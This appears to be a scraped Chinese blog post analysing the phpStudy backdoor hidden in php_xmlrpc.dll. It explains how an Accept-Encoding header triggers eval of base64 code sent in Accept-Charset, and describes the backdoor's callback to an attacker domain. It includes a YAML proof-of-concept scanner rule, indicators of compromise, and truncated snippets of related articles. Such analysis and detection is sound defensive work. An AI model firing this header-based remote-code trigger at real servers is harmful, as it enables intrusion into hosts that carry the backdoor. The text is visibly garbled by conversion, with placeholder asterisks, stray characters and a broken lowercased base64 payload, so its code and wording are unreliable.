phpstudy後門簡單分析

2021-09-27 09:55:34 字數 2912 閱讀 5582

感謝pcat師傅的文章:

20號得知phphstudy有後門,不知道官網的是不是也被入侵了,當時沒有進行檢視,,,由於當時正在秋招面試比較忙,鴿了幾天有了下文:

被中馬的為php_xmlrpc.dll這個dll檔案,這個可以通過查詢洩露字串很容易通過指令碼實現,就不貼了,可以以eval為關鍵字來進行搜尋

phpstudy2018

版php-5.2.17

和php-5.4.45

存在後門

上圖為ida搜尋字串得到的資料,由此可以基本驗證這個dll檔案為可以檔案,接下來要驗證他的控制流

這裡拼接了乙個@eval(gzuncompress('%s'));的**,明顯是呼叫gzuncompress方法解密執行某些**,沒解密前的**來自asc_1000d028到unk_1000d66c這個部分,拼接好的上方放在v44處,(gzuncompress很多時候可以用作木馬免殺,龜龜)

正向連線:判斷accept_encoding如果等於gzip,deflate,讀取accept_charse的內容做base64解密,交給zend_eval_strings()函式可以執行任意惡意**。

zend_eval_string處執行v42處執行的**,我們把資料提取出來,並進行處理,並且經過php的gzuncompress解碼,得到以下

基本上就是fsockopen的通訊,回連攻擊者的$ip = '360se.net', $port = '20123',中間一堆其他的條件

今天剛好到期

漏洞驗證外掛程式

name: poc-yaml-phpstudy-backdoor-rce

rules:

- method: get

path: /index.php

headers:

accept-encoding: 'gzip,deflate'

accept-charset: chjpbnrmkg1knsg0ntczmtm0nckpow==

follow_redirects: false

expression: |

body.bcontains(b'a5952fb670b54572bcec7440a554633e')

detail:

author: 17bdw

affected version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"

vuln_url: "php_xmlrpc.dll"

links:

-

ip133.130.101.150

domain

360se.net

bbs.360se.net

www.360se.net

up.360se.net

down.360se.net

cms.360se.net

file.360se.net

ftp.360se.net

md5

0f7ad38e7a9857523dfbce4bce43a9e9

使用Ghidra分析phpStudy後門

主要工具 kali linux ghidra 9.0.4 010editor 9.0.2 樣本環境 windows7 phpstudy 20180211 先在 windows 7 虛擬機器中安裝 phpstudy 20180211,然後把安裝完後的目錄拷貝到 kali linux 中。根據網上公開的...

phpstudy後門復現

1.影響版本分布 2.直觀感性驗證 用記事本或者notepad 開啟phpstudy安裝目錄下的 phptutorial php php 5.4.45 ext php xmlrpc.dll 存在 eval s s 即說明有後門。3.客觀理性驗證 bp抓包復現 直接訪問首頁抓包 在請求頭里構造 acc...

phpstudy後門檔案檢測及利用

bin bash author pcat chamd5.org trojan feature trojan eval function check dir x dll x then strings f2 grep q trojan if 0 then echo f2 strings f2 grep ...